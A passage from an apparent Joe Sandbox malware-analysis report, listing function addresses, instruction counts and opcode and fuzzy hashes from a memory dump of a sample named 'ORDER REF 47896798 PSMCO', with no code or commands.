                                                                                            Function 0193A30B Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 691537792674da7fdc1451526fb709c0e06e5916b087087ed0bce01a03cca120
                                                                                            • Instruction ID: 222ef0c86374ca6c587aa21341c4040cd9fb44756767614926192bcc36eb911c
                                                                                            • Opcode Fuzzy Hash: 691537792674da7fdc1451526fb709c0e06e5916b087087ed0bce01a03cca120
                                                                                            • Instruction Fuzzy Hash: AF217779600B01AFCB25DF29C901B56B7F5BF88B04F24846CA54DCBB61E371E942CB94
                                                                                            Function 019BA49A Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d56eb2c95d5048cdb099c3fc0e9f73d75baea1427957d44362ecbe5a4f750452
                                                                                            • Instruction ID: 2882faf99c8557d53a1a23e0ba07d40952eac91e2b4b1931439572825afde154
                                                                                            • Opcode Fuzzy Hash: d56eb2c95d5048cdb099c3fc0e9f73d75baea1427957d44362ecbe5a4f750452
                                                                                            • Instruction Fuzzy Hash: FF112332280A15BFE32256599D80FAB7AD9DBD5B60F510028B70DCB280EBA4EE008795
                                                                                            Function 01980946 Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fa7fa7f11e330913d36dc7567f1d7785f41ba46f959157b30b82cdb0d84df5dd
                                                                                            • Instruction ID: ce708b2d7d0f09115ba9cd49701e43cc258e954e6b85c47ddd8d80ea709de143
                                                                                            • Opcode Fuzzy Hash: fa7fa7f11e330913d36dc7567f1d7785f41ba46f959157b30b82cdb0d84df5dd
                                                                                            • Instruction Fuzzy Hash: C221E5B1E00209ABDB20DFAAD8819AEFBF8FF98700F10012EE509E7240D6749945CB54
                                                                                            Function 019980A8 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                            • Instruction ID: fc0256642df2b3ad9553099f7aee8b4202075a07f0f8ad973ba03cc8c018d921
                                                                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                            • Instruction Fuzzy Hash: FD216DB2A00209AFDF229F98CC40BAEBBB9FF89350F214819F908A7251D734D9508B50
                                                                                            Function 01930124 Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                            • Instruction ID: 60a2dde8ca9861e6e93e9430e532aaf785edf17615e170d238cb51b2e4e8e591
                                                                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                            • Instruction Fuzzy Hash: C711DD76600609AFE722DA88CC80F9ABBB8EBD1754F150029F6098B190D671EE44DB60
                                                                                            Function 01908770 Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbb51f9f2e014cae291d66e13af6ddfa2adb0f7a811b2b323726030c2aa88722
                                                                                            • Instruction ID: b6be7af0d59cf4c91d4208aee197e51e8ff3a356bdecd85fe41a8b794f5ecbab
                                                                                            • Opcode Fuzzy Hash: cbb51f9f2e014cae291d66e13af6ddfa2adb0f7a811b2b323726030c2aa88722
                                                                                            • Instruction Fuzzy Hash: 5411C131B00611DFDB12CF4DC4C0A66BBE9AF9A711B19807DEE0C9F249D6B2D901CB91
                                                                                            Function 0193AAEE Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                            • Instruction ID: 3c842caf7b38fc32d8e9c58ba52a2f374043e3f9e34f5f25f08f13388d326db3
                                                                                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                            • Instruction Fuzzy Hash: A9216872600A41DFD7298F49C940E66BBFAEBD4B11F15886EE98AC7620C631ED01CB80
                                                                                            Function 019080E9 Relevance: .1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2034ca216ce52e560ee710116fc6c8a8922d71c07f42c71981b33241d894bf0d
                                                                                            • Instruction ID: 24292f1127a48018095bf710bd027dd58bcf8a803e514d88388649e56417ffd3
                                                                                            • Opcode Fuzzy Hash: 2034ca216ce52e560ee710116fc6c8a8922d71c07f42c71981b33241d894bf0d
                                                                                            • Instruction Fuzzy Hash: 8E214C75A00206EFCB15CF58C581A6ABBF5FF89314F24456DD109A7355C771AD06CBD0
                                                                                            Function 0193674D Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cfdeba2426bf83adaef7fef216ab384c0c025b7cf1c0fd4ab21b4470e311871
                                                                                            • Instruction ID: 9957c905b447f99b05bb31f5c71819c8fb3232c20bdc0f15f39f61d31dfbb814
                                                                                            • Opcode Fuzzy Hash: 4cfdeba2426bf83adaef7fef216ab384c0c025b7cf1c0fd4ab21b4470e311871
                                                                                            • Instruction Fuzzy Hash: 6C215675600B01FFD7218F68C881F66B7E8FB84250F40882DE5AEC7250EA30AA40CBA1
                                                                                            Function 0192E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e1073b583170e0375b096cb8677191999f2f2df9ed852a228e6a2872d3413fe
                                                                                            • Instruction ID: dfd8de6c3972f51cfd5b74be06a5717015c91c71ddae9ce7acf12034d87aa634
                                                                                            • Opcode Fuzzy Hash: 1e1073b583170e0375b096cb8677191999f2f2df9ed852a228e6a2872d3413fe
                                                                                            • Instruction Fuzzy Hash: 1C112F377052145FCB19DB29DC91A6BB25AEFD5370B25452DD92ECB294E9309C01C390
                                                                                            Function 01996870 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76d04bf6d00206eaeab36e1c7f0b55f9e267e0445151e13fca45123986cd9d49
                                                                                            • Instruction ID: 2a0268f48681f7aa01fb347daf20f2db6f08dd0d88a8e08206d41f44d27f2b5b
                                                                                            • Opcode Fuzzy Hash: 76d04bf6d00206eaeab36e1c7f0b55f9e267e0445151e13fca45123986cd9d49
                                                                                            • Instruction Fuzzy Hash: 2011C632240614EFDB22DB5ECD40F9A7BA8EF95761F114025F609DF261DA70E901C7D0
                                                                                            Function 019366B0 Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf6c6fea26599530cda4cc75d8f1f2c0043108565693a0697118940436261edb
                                                                                            • Instruction ID: 096b84a7f054e54aba6f8dee8482a5155d04fb48c420d5f916f506677a1bba82
                                                                                            • Opcode Fuzzy Hash: cf6c6fea26599530cda4cc75d8f1f2c0043108565693a0697118940436261edb
                                                                                            • Instruction Fuzzy Hash: 9C11BC76A01305ABCB26DF59C580E5ABBF8ABC4650B51407DD90A9B315E630EE00CBA0
                                                                                            Function 019CA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                            • Instruction ID: c76f665f2394e71afc34a944d3f0aceb9d7b88d97fa0cc5d9b52384545016978
                                                                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                            • Instruction Fuzzy Hash: F5110436A00909AFDB19CB58CC45B9DBBF5EFC4710F058269E88997340E631BE41CB80
                                                                                            Function 01900AD0 Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                            • Instruction ID: 9f328e01add0eac4b70a3cc15b88cd18f94e719a91898c4758d579ba0d1691ed
                                                                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                            • Instruction Fuzzy Hash: B42106B5A00B059FD3A0CF29D440B52BBF4FB48B10F10492EE98AC7B50E371E854CB90
                                                                                            Function 0198E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                            • Instruction ID: f1705f4e03d4bfc1d1641b8b06b19dae029ecb30da54f9803642295f1414bc21
                                                                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                            • Instruction Fuzzy Hash: B611C232610601EFE721AF49C854F5EBBF9EF85755F058428EA0D9B160DB71DC80DB91
                                                                                            Function 019227ED Relevance: .1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6b50121d9119bdf499442a8a487b66dd74eda00795d76d2ff0c10bc48cc2e007
                                                                                            • Instruction ID: f4eafed16e46112f9581597f8aaf75e1e00f431e9efd0b33a887e7c0d9fc4c7d
                                                                                            • Opcode Fuzzy Hash: 6b50121d9119bdf499442a8a487b66dd74eda00795d76d2ff0c10bc48cc2e007
                                                                                            • Instruction Fuzzy Hash: 7A010431605685ABE316A76E9C54F276A9CEF90291F050465F90C9B250D954DC00C272
                                                                                            Function 01904690 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bfc077053f457db13b1d802e87cee9870b532d5dfcf0be4254d2d8e74c7c9cf7
                                                                                            • Instruction ID: c5f33201784515495069f1ac15d8340bb5a45bf28404c65cc197b5b34479f8c3
                                                                                            • Opcode Fuzzy Hash: bfc077053f457db13b1d802e87cee9870b532d5dfcf0be4254d2d8e74c7c9cf7
                                                                                            • Instruction Fuzzy Hash: FE11A036200745AFDB27CF5DD984F567BA8EB96B65F014529FA088B690C374EC40CF60
                                                                                            Function 019D4B00 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 717b9db23f795516ca1d160260ea7adf1a92fae90d471820831de192510db1df
                                                                                            • Instruction ID: 705491045daf1312ce4181b0c4e0ed3e5b2bbf0c1e9bb058815383ba2d9f8327
                                                                                            • Opcode Fuzzy Hash: 717b9db23f795516ca1d160260ea7adf1a92fae90d471820831de192510db1df
                                                                                            • Instruction Fuzzy Hash: 761129362006119FD721DB2DD840F2BB7AAFFD4311F148429E68AC7A54DA34E802CB90
                                                                                            Function 01936620 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0137bf96601d22e224cd913cda410e95061b37f01f1f9ded77566b4e506968f3
                                                                                            • Instruction ID: f2d80142309ac061e525000c760c190cb1c0d88c600549c8f79b8560df9bfd0a
                                                                                            • Opcode Fuzzy Hash: 0137bf96601d22e224cd913cda410e95061b37f01f1f9ded77566b4e506968f3
                                                                                            • Instruction Fuzzy Hash: 6311C272A00715BBEB22EF59C980B5EFBB8EFC4795F510058DA09A7240D730AE019B60
                                                                                            Function 0192EA2E Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e0c7a7e2471f763fcc6bd3468ac00173c4619fd2bbbd44c1478466bbd9ba2c30
                                                                                            • Instruction ID: 29c634fb6153b73b9d2bf94c06e29dd5da4909710ca6abb41a3de1544de91ba8
                                                                                            • Opcode Fuzzy Hash: e0c7a7e2471f763fcc6bd3468ac00173c4619fd2bbbd44c1478466bbd9ba2c30
                                                                                            • Instruction Fuzzy Hash: A4019271901209AFD725DB19D444F16BBF9EBD5315F22816EE2098B2A8C7709C42CB90
                                                                                            Function 0192E53E Relevance: .1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                            • Instruction ID: 04a1b1d749febee75d5bae20d15310ab0d622325dcbed305e5d7eb2e3700c173
                                                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                            • Instruction Fuzzy Hash: DA110C722116D59BEB23971CD5A4F2577ECFF40755F1904E0DD4D87646F328C881C260
                                                                                            Function 0198E75D Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                            • Instruction ID: a3866e1d095dd58227ca65e74e6fd83521e62102d7e86b22c83c2af9ca3accb9
                                                                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                            • Instruction Fuzzy Hash: AC019236600105BFE721BF58CC10F5A7AADEB95755F058424EA0D9B260E771DD40C790
                                                                                            Function 018FA250 Relevance: .1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                            • Instruction ID: d492b5a3d26a09ecdb1acb8610eeaceabe1c27ffdd01ef0a58cefb579d21154a
                                                                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                            • Instruction Fuzzy Hash: 40012635604B25ABCB358F19E840A327BA4EF95770700862DFE9DCB281C731D500CBA0
                                                                                            Function 019D4940 Relevance: .1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b0e7045768ccab5e5c2152b8c2fab398c7c4ec6dda78aefc3b079c44411b9e0d
                                                                                            • Instruction ID: f5bae1648ac9626766c26812408b332ca19f1d5fef6062939e04833115cdde68
                                                                                            • Opcode Fuzzy Hash: b0e7045768ccab5e5c2152b8c2fab398c7c4ec6dda78aefc3b079c44411b9e0d
                                                                                            • Instruction Fuzzy Hash: 7401F5735416019FC332DF1ED840E12B7ACEB91B71B258265E9AD9B5AAE730EC41CBD0
                                                                                            Function 0197E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89491830ee16d1679fcf1421520310133cbfd326eda2002fdc78e22c4e61b0d4
                                                                                            • Instruction ID: 4668f29290e7050036f634ff4f824b8eb5bad19a056f1d4f3e718eee2e3ebac4
                                                                                            • Opcode Fuzzy Hash: 89491830ee16d1679fcf1421520310133cbfd326eda2002fdc78e22c4e61b0d4
                                                                                            • Instruction Fuzzy Hash: 1511A135241241EFDB16EF19CD80F167BB8FF94B54F1004A9EA099B691C635ED01CB90
                                                                                            Function 01906259 Relevance: .1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 90e1aebc5be1f66e4c82c54d7c22d24edf1b58936ff9921ebc829a050fb31816
                                                                                            • Instruction ID: c8e1dbbdc7f52ae261a8953a67495b565f3e9302636462d1743090a0e2f842ce
                                                                                            • Opcode Fuzzy Hash: 90e1aebc5be1f66e4c82c54d7c22d24edf1b58936ff9921ebc829a050fb31816
                                                                                            • Instruction Fuzzy Hash: 8B115A71641629ABDB36EF68CC42FE9B378BF84710F504194B318A60E1DB709E91CF84
                                                                                            Function 0190208A Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                            • Instruction ID: bf00795620f081a9bcab6e7dbfc0c1e6e68ea97c73c8043b34932a4e8a79eaf7
                                                                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                            • Instruction Fuzzy Hash: B601F1326002108FEF12CB2DD888E92777BBFC4710F5544A5ED0D8F28ADA718881C390
                                                                                            Function 01986050 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 056e8a5c69a533a3175acd8444553bd8ab877a9f911eaadabec28e6037b2782d
                                                                                            • Instruction ID: 3e343c68458e8bba93326df65f80e77268519f0d603e6613bdbdc42b8375e9a9
                                                                                            • Opcode Fuzzy Hash: 056e8a5c69a533a3175acd8444553bd8ab877a9f911eaadabec28e6037b2782d
                                                                                            • Instruction Fuzzy Hash: 0A111777900019BBCB12EB95CC84DDFBB7CEF88254F054166E90AE7211EA34AA55CBE0
                                                                                            Function 01996500 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 068397e9e788ed35d209350e4a9f2cb43c67195984356eaf4f1fc1cb8b650fcc
                                                                                            • Instruction ID: 97eaf83e17c003382cceaffedecca4cd1d4f28a2631056f692561160ea29c328
                                                                                            • Opcode Fuzzy Hash: 068397e9e788ed35d209350e4a9f2cb43c67195984356eaf4f1fc1cb8b650fcc
                                                                                            • Instruction Fuzzy Hash: 1D11C4766441469FDB11CF5CD800BA6BBB9FB9A314F098159E848CB325D732EC81CBA1
                                                                                            Function 0198C810 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 620701cfd2707a38b7bc757ef4669c82b191dd2b4709046f7549d0c0f09d9564
                                                                                            • Instruction ID: f3f93df3db0eb7d3f6643e727c3754d017990815dad9f8ec1c2bce2e8cba6477
